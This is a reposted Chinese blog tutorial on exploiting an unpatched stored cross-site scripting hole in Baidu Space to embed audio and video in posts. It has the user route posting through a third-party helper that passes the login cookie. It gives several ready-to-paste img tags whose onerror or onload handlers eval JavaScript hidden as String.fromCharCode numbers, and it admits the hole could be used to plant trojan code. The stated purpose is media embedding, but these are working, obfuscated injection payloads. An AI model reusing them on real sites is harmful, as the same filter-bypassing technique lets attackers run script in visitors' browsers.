转自:http://hi.baidu.com/tianshixiadao/blog/item/bba4bc13507092816538dba1.html
效果演示:
http://hi.baidu.com/tianshixiadao/blog/item/46ff0fa4ed146bf69052ee8a.html(音频)
http://hi.baidu.com/tianshixiadao/blog/item/29116923a539f2539922ede1.html(FLASH)
http://hi.baidu.com/tianshixiadao/blog/item/c120fe438036401272f05d57.html(各种格式)
适合视频地址大全:
http://hi.baidu.com/tianshixiadao/blog/item/2f2276ee1921b7fab3fb9567.html
想改变视频大小请给代码解码后调政
偶所找到的百度XSS漏洞之一(单页面跨站),虽然多次以多种形式提交(
关注百度),但直到今天,还是没有修补。偶一直想等到百度修补之后再公布漏洞,主要是怕一些人利用这个XSS方法,在其空间加入挂马代码。呵呵!在几日之前,我在其空间公布了这个XSS漏洞,但直到现在,百度还是没有修补,唉,无语!
既然漏洞原因已经放出,下面就来介绍一下如何利用这个漏洞,将多媒体文件插入到单页面之中。刺猬常用的方法是抓数据包,然后再用偶的POST提交工具进行提交,但这种方法,不适合于大多数朋友,下面就介绍一种简单的方法。
一、编辑“友情链接”,在其中加入一个链接地址,“
http://dohi.cn/editor”,如图1,这是“monyer”制作的“百度空间发帖助手”。加入这个链接的目的有二,一是此页面可以传递Cookie值,二是为了发贴方便。
二、点击“友情链接”中的该链接,打开的页面如图2,这里说明几点:
1、分类的选项是“默认
分类”,如果将此页发在另外的分类中,则根据分类的位置选择下面的“第*分类”。
2、在文本输入框内的“提醒:使用前请确认你要向百度空间
http://hi.baidu.com/0x2b发 布文章”,这其中的baidu.com地址处后一定要是自已当前的用户名,比如现在的是0x2b,是我 天使下到 试用户名,如果用户名是jmdcw,那么这儿显示的就应该是Jmdcw。注意,这个值不是自已可以更改的,而是通过Cookie来分析的,一定要确定自已 的用户名在其中。
三、在“文本框”内输入文字内容,以便让多媒体文件显示在页面之中,这里说明一下,如果将多媒体地址放在文章前面,虽然浏览时方便,但在打开空间时,因为多媒体文件在引入之前,会去访问其地址,这样,无形之间就让你的页面显示变慢了,所以推荐放在页面之中。
下面用视频“该死的温柔”进行演示,首先找一段歌词放在前面,这里你可以对这段文字进行美化,然后将视频地址:“http://v9.99yu.com/mtv/99yu6/马天宇_该死的温柔.wmv”放在文字下方,地址及文字中间要打几个回车,以便后面插入数据。
接下来,去除视频地址中的“链接”,如图3。然后再点击工具栏中的“U”,对此地址加下划线,(为了避免以后使用另一XSS插入多媒体时出现冲突,这里用采取的是下划线的方式)。
四,一切设置完毕后,点击“工具栏”中的“源代码”按钮。然后,在“</p>”后加入如下代码:
(音频):
<div><img src=jmdcw"onerror=eval(String.fromCharCode(118,97,114,32,109,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,117,39,41,59,32,109,91,48,93,46,111,117,116,101,114,72,84,77,76,61,39,60,101,109,98,101,100,32,115,114,99,61,39,43,109,91,48,93,46,102,105,114,115,116,67,104,105,108,100,46,100,97,116,97,43,39,32,97,117,116,111,115,116,97,114,116,61,48,62,39,59))></div>
(视频 450*350):
<div><img style="display:none" src=jmdcw"onerror=eval(String.fromCharCode(118,97,114,32,109,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,117,39,41,59,32,109,91,48,93,46,111,117,116,101,114,72,84,77,76,61,39,60,101,109,98,101,100,32,115,114,99,61,39,43,109,91,48,93,46,102,105,114,115,116,67,104,105,108,100,46,100,97,116,97,43,39,32,97,117,116,111,115,116,97,114,116,61,48,32,119,105,100,116,104,61,52,53,48,32,104,101,105,103,104,116,61,51,53,48,62,39,59))></div>
,插入后的效果如图4.
五、在设置完标题及类别后,点击下方的“发表文章”,就在这个页面中插入了一个多媒体文件,接下来,打开该页面,就能够看到视频效果了。如图5。
2、前面插入的是视频,设置的不是自动播放,并且不是循环播放,如果插入的是音频文件,可以采取自动播放加循环播放,代码是:
<div><img src=jmdcw"onerror=eval(String.fromCharCode(118,97,114,32,109,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,117,39,41,59,32,109,91,48,93,46,111,117,116,101,114,72,84,77,76,61,39,60,101,109,98,101,100,32,115,114,99,61,39,43,109,91,48,93,46,102,105,114,115,116,67,104,105,108,100,46,100,97,116,97,43,39,32,108,111,111,112,61,84,114,117,101,62,39,59))></div>
3、前面的IMG地址是不存在的,所以图片显示的是一个红叉号,如果要去除此叉号,则src前的代码是:<img style="display:none" src=jmdcw"....>。
4、如果src 所链接是一个存在的图片,则用onload事件,<img src=http://www.lzdodo.com/wp-content/uploads/auto_save_image/2012/07/0100387CX.jpg"onload=eval(......)>
5、对上面的代码,在复制时,为防止HTML干扰,请先复制到记事本中,并将“记事本”菜单栏中的“格式”下的“自动换行”前的对勾去除,将这些代码一行显示,然后再复制到“发贴助手”中。
6、 将其中数字值更改为:
118,97,114,32,109,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,117,39,41,59,32,109,91,48,93,46,111,117,116,101,114,72,84,77,76,61,39,60,101,109,98,101,100,32,115,114,99,61,39,43,109,91,48,93,46,102,105,114,115,116,67,104,105,108,100,46,100,97,116,97,43,39,32,97,117,116,111,115,116,97,114,116,61,48,32,119,105,100,116,104,61,52,53,48,32,104,101,105,103,104,116,61,51,53,48,62,39,59
这个是width=450 height=350的视频标准,如果可以正常显示,则说明代码成功,如果不行的话,则是onerror不允许插入这么多的字符.